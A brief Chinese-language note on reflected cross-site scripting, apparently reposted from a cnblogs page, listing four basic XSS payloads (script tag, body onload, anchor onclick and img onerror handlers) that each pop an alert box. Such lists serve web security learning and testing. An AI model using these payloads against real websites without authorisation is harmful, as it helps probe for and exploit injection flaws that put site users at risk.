反射型XSS
- <script>alert(‘xss’)</script>
- <body onload=alert(‘xss‘)>
- <a href=‘‘ onclick=alert(‘xss‘)>click</a> //增加一个click按钮,点击执行
- <img src="#" onerror=alert(‘xss‘)> //src地址为空(或错误地址),然后执行onerror的内容
XSS命令笔记【待更新】
原文:https://www.cnblogs.com/xXDw/p/12423131.html